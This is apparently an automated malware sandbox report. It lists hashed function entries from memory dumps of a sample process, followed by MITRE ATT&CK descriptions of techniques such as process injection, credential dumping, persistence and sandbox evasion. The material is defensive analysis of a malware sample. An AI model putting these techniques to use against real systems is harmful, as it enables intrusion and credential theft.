Function 02809C58 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0280B7F6

Memory Dump Source

Source File: 00000019.00000002.3910795145.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2800000_bmBOz.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 95ca735fe5b169856e9be3299c172b7194a4dd180650bf2250401478e830c8cc
Instruction ID: 90f384a52ed4d0763e6238946a452139d8b51da70e9ab3e4e8f332c6fdbca0ec
Opcode Fuzzy Hash: 95ca735fe5b169856e9be3299c172b7194a4dd180650bf2250401478e830c8cc
Instruction Fuzzy Hash: 8911F3BAC007498FDB20CF9AD884BDEFBF4EB48218F10842AD429B7651D375A545CFA5

Function 0280B788 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0280B7F6

Memory Dump Source

Source File: 00000019.00000002.3910795145.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2800000_bmBOz.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 673fcc7651813825a4987ed07a1bf2f8a34ef6262f03fbccdd16f10611f372f4
Instruction ID: e1e4d554959af6f031f8e2f3013e6b05101737b40652447679a62cde412209e9
Opcode Fuzzy Hash: 673fcc7651813825a4987ed07a1bf2f8a34ef6262f03fbccdd16f10611f372f4
Instruction Fuzzy Hash: 611120BAC006498FDB20CF9AC484ADEFBF4EF88214F10845AD469A7350C375A505CFA5

Function 06A322FC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06A33DE5), ref: 06A33E6F

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: bd6e981fcb8042f4b4ef94895be73e4e9607961ca288184f61e236c9f1b9d53e
Instruction ID: bad2eb5728dcafb0570ed36820f46dc92587ced1002b96832a68ab4036d048b4
Opcode Fuzzy Hash: bd6e981fcb8042f4b4ef94895be73e4e9607961ca288184f61e236c9f1b9d53e
Instruction Fuzzy Hash: 7B1122B5804348CFDB20DF9AC484BDEBBF4EB48310F20841AE519A7340C379A940CFA5

Function 06A370C4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06A37A3D

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e8a8b3e6a080ef1788a5881a26ab87448ed9ba13ce01853e784850697f972187
Instruction ID: 446ac3cd3591e8fc4e8f2006d188cd59551e9a16793501ef4308bb00402f724a
Opcode Fuzzy Hash: e8a8b3e6a080ef1788a5881a26ab87448ed9ba13ce01853e784850697f972187
Instruction Fuzzy Hash: CB1103B5C00748CFDB20DF9AD445BDEBBF4EB48224F208459E519A7640D379A944CFA5

Function 06A33E09 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06A33DE5), ref: 06A33E6F

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 47a07cda57eaef7b7c93cd0093ccd2ebdf315c64dca79c818c0245e3d16789d9
Instruction ID: 9eca41de9ad6226dc83638fd0bed1b108c5e3d496dbd35b0151504f1bdd81e0d
Opcode Fuzzy Hash: 47a07cda57eaef7b7c93cd0093ccd2ebdf315c64dca79c818c0245e3d16789d9
Instruction Fuzzy Hash: 7A1122B5804348CFDB20DF9AD844BDEBBF8EB49310F20841AE418A7240C775A944CFA5

Function 06A379E0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06A37A3D

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c8e732eb0ded7622c611dfbd7cc0baf04b366e80817b6aefc4e5ebd08da9fdf7
Instruction ID: a6475fed802b05ca8157dd7e5df35693b6422a796abb70dd16f3c66fb9ad6d89
Opcode Fuzzy Hash: c8e732eb0ded7622c611dfbd7cc0baf04b366e80817b6aefc4e5ebd08da9fdf7
Instruction Fuzzy Hash: 9011F2B5C00349CFDB20DF9AD445BCAFBF4EB48224F248419E519A7640D779A644CFA9

Function 04D83388 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70bf23c3ebb6f683ad9731bb435bc020648cc40b82e6ced1ab642ca8c23af0d
Instruction ID: 3321a49ba5e137b8d67b2903e6c1befeccb5dbec3e2ec154fb0ed68ada83d553
Opcode Fuzzy Hash: a70bf23c3ebb6f683ad9731bb435bc020648cc40b82e6ced1ab642ca8c23af0d
Instruction Fuzzy Hash: DCD17C70E003089FDB14EFA9C8556AEBBF2FF88710F14856DD809AB351DB35A945CB91

Function 04D807A8 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008b77194c68cd8ee7253afaf46d006f657235ff6fc70d05ab2058c79c161bed
Instruction ID: 64ec03a4e542d5efaaa667edd3cfffa1e71d33235371ef0422631495291a4b38
Opcode Fuzzy Hash: 008b77194c68cd8ee7253afaf46d006f657235ff6fc70d05ab2058c79c161bed
Instruction Fuzzy Hash: 67718D31D003499FDB11EFA9D884AEEFBF1FF49310F11892AD559A7210E734A989CB90

Function 04D83379 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccbf1c7470926e1ce1d690124a935cf61a62b47a1b2f9569d02948b4c28ce6cc
Instruction ID: 45f04664cf072005ed7acca2d53add4147157372d612b1a0bf986034256c1113
Opcode Fuzzy Hash: ccbf1c7470926e1ce1d690124a935cf61a62b47a1b2f9569d02948b4c28ce6cc
Instruction Fuzzy Hash: F8416C31A007099FDB14EFA9C4446ADBBB1FF88710F14C65DE8097B264EB71A985CB90

Function 04D80034 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bdf645c0ca5ce5ae39bbd8e336ce57808156681c6f29b4dc2e1684bc2c3cbc
Instruction ID: 7ac2dea43a8ab519901d9a94160dbc0b197db2ed90c415afa71ac3eb8f171463
Opcode Fuzzy Hash: 04bdf645c0ca5ce5ae39bbd8e336ce57808156681c6f29b4dc2e1684bc2c3cbc
Instruction Fuzzy Hash: A241E2B1D00348DFDB25DFA9C984ADDBBB1BF49314F25801DE409AB241D7756A4ACF90

Function 04D80040 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4787319a5f8ba74d3b47894ee840160051d15ea00744f405ccb48a1fb105c2
Instruction ID: ffb860bf3b37335dee5a4b756509a30d0ffa09a13c3c06819678d72860b64b1f
Opcode Fuzzy Hash: 9b4787319a5f8ba74d3b47894ee840160051d15ea00744f405ccb48a1fb105c2
Instruction Fuzzy Hash: 3C41E2B1D00309DFDB24DFA9C984ADEBBB5BF48304F258019E409AB240D7756A49CF90

Function 04D836FC Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969a99185610b94d5146ec68030e137fc2b88763a26cf254c751d1677bfa8036
Instruction ID: 688e48d0cbdae8699420ba2f2838bc4c49fe7359a7fbc47de697cf0941f03253
Opcode Fuzzy Hash: 969a99185610b94d5146ec68030e137fc2b88763a26cf254c751d1677bfa8036
Instruction Fuzzy Hash: E431E2B4D01248DFEB24DF99C985BDEBBF5BB48714F20801AE808AB240C776A845CF91

Function 0104D20C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3909398321.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_104d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2081a95ae5ca0476cb962d26af1d559e4f8d6d11b764bd8fcf308646fe74a62a
Instruction ID: e9a969322c86b9fc4debf2499882dce165f6debb62f4dd2ba129f7118b4344a1
Opcode Fuzzy Hash: 2081a95ae5ca0476cb962d26af1d559e4f8d6d11b764bd8fcf308646fe74a62a
Instruction Fuzzy Hash: B42107B1504244DFDB15DF54D6C4B2ABBA5FBA4324F20C5B9E8890B242C376D406CB62

Function 0104D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3909398321.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_104d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b88e868ed6b00f3f0835c3502a7426b7d1e69e2956c709abe4e0f699b892c9
Instruction ID: 42a15ea9712e32e8e6d8de211d186774ffbfe22d7000b68c04384fdd27576182
Opcode Fuzzy Hash: 35b88e868ed6b00f3f0835c3502a7426b7d1e69e2956c709abe4e0f699b892c9
Instruction Fuzzy Hash: 8F21D3B1504204EFDB15DF94D9C0B26BBA5EB94314F24C5BDE9894B292C336D447CB62

Function 0104D3BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3909398321.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_104d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5dfe999bf656374e05e1cfa71297cb61c25345ef8c3b26e3fff3ce705a256a
Instruction ID: fcce3d1068ab7b8b319ca11db5b679dc3ff4b1d5f873ac9d480cace367f969ae
Opcode Fuzzy Hash: 9a5dfe999bf656374e05e1cfa71297cb61c25345ef8c3b26e3fff3ce705a256a
Instruction Fuzzy Hash: C32125B1500200EFDB05DF64D5C0B26BBA1FB94314F20C5BDE9490F292C736E446CB62

Function 04D82F44 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4328f2f63493c5f3ded143b0dbd3aea57e30cd76be45aa5786d1fd6a85e67a6
Instruction ID: 7931f4602162e3a7fa0d3c0a8c1630d31c73002f30c96d6f51b9ae5f854e173a
Opcode Fuzzy Hash: b4328f2f63493c5f3ded143b0dbd3aea57e30cd76be45aa5786d1fd6a85e67a6
Instruction Fuzzy Hash: 4031C5B4D01218DFEB20DF99C985B9EBBF5FB48714F148419E808B7240D775A845CF95

Function 0104D207 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3909398321.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_104d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a37c6801951d4ba7ad7433749c44e8efe01c680cd3f8f024970093133622734
Instruction ID: a7987ecb0026e33c2441677198866a15b8c8129b570238da1c0dd7b84ebd3a3b
Opcode Fuzzy Hash: 8a37c6801951d4ba7ad7433749c44e8efe01c680cd3f8f024970093133622734
Instruction Fuzzy Hash: 5011B2B6504284DFDB12CF54D6C4B15FFA1FB94324F24C6AADC494B656C33AD406CB52

Function 0104D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3909398321.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_104d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: d7bb439e1a4d92d85854e9b5bc45047969fb9d13c8a8d5dfff60501932f05401
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 0D11BEB5504280DFDB16CF54D5C0B15FFA2FB84314F24C6AAE8494B697C33AD44ACB62

Function 0104D3B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3909398321.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_104d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: d44d13fbc4b9d38e6191e248ddf3ed503398099125c62a6b1f3c2f617aaf0952
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 9411BEB5504240DFDB06CF54D5C4B15BFA1FB84314F24C6A9D8494B696C33AE40ACB51

Function 00E9D819 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3908916219.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e9d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82965177e8563ca1d9dd2ec424c6e8241ee84e0d655bcb1227d5e41d816b318
Instruction ID: ff2e6507e3e0950da2aa93ce734c016b730783e41cf0ff9224708f9839c8c157
Opcode Fuzzy Hash: a82965177e8563ca1d9dd2ec424c6e8241ee84e0d655bcb1227d5e41d816b318
Instruction Fuzzy Hash: B501A77150C350AAEB345A25CC847A6FB98EF41764F18955AED096E287C275D840CAB2

Function 04D83BD0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412c0c07f70b4563a39615bef06c861db98d1cc93192e4c60b9e997f41bcc807
Instruction ID: 29a309d2349f04ca7eb1bfbb1ad9ba25217a37b5cb88e459a7ac114a5f1ad746
Opcode Fuzzy Hash: 412c0c07f70b4563a39615bef06c861db98d1cc93192e4c60b9e997f41bcc807
Instruction Fuzzy Hash: 0CF096313052501FC7947A6D5898A7F379EEBC6661B514479E50ED7252DA029C018791

Function 04D80799 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 480b8048d0a5d75581a0de0135af45c23e346b940416939855fe6e5180e82baf
Instruction ID: a5f27e47c07c93de8c840a7f37b4d19f7321367ff35329f0816389cb6e581e1a
Opcode Fuzzy Hash: 480b8048d0a5d75581a0de0135af45c23e346b940416939855fe6e5180e82baf
Instruction Fuzzy Hash: 32F06235E06258AFCB22EEA9DDC59AEFB79FB01210F56457AE504C7111D320A948CBE1

Function 04D808C8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e209f3268dd1d24a06a91e8dac73554551f3147d36b4f108690e85fb33516be6
Instruction ID: aaaf68d34494df040c541a3ff2111ecfb0cd9dc11ba0711a9b69c995c639dc8a
Opcode Fuzzy Hash: e209f3268dd1d24a06a91e8dac73554551f3147d36b4f108690e85fb33516be6
Instruction Fuzzy Hash: 1D01283590425A8FEB44EFA0C950BFEBBB6AF89300F154428C952B7354EB746909CBA0

Function 00E9D818 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3908916219.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e9d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8709ddd5e73ac2a05788b3cee6ee30766a853547ce5842479cefd619a057d4d
Instruction ID: 27e10160e4b75543c8c81a860a53ceed4429e3b7cbf9dcfef35df53ddcbd5a4b
Opcode Fuzzy Hash: d8709ddd5e73ac2a05788b3cee6ee30766a853547ce5842479cefd619a057d4d
Instruction Fuzzy Hash: 5EF0C272408340AEEB248E06CC84BA2FFD8EF41734F18C45AED081F283C2799840CAB1

Function 04D83BE0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3936324248.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_4d80000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c05811b38459a123b57c194d4535afb4ed1c634ea18df9e34d773ce518ffab71
Instruction ID: ea00b16d3b075a2c42aa8e0fe32422cd8ae417cb10036c3b3ca86d300d79d7aa
Opcode Fuzzy Hash: c05811b38459a123b57c194d4535afb4ed1c634ea18df9e34d773ce518ffab71
Instruction Fuzzy Hash: 5AF0A0353102101F8794B66D9898A7F32CFFBC9674B504438E50EDB351DA12EC018391

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
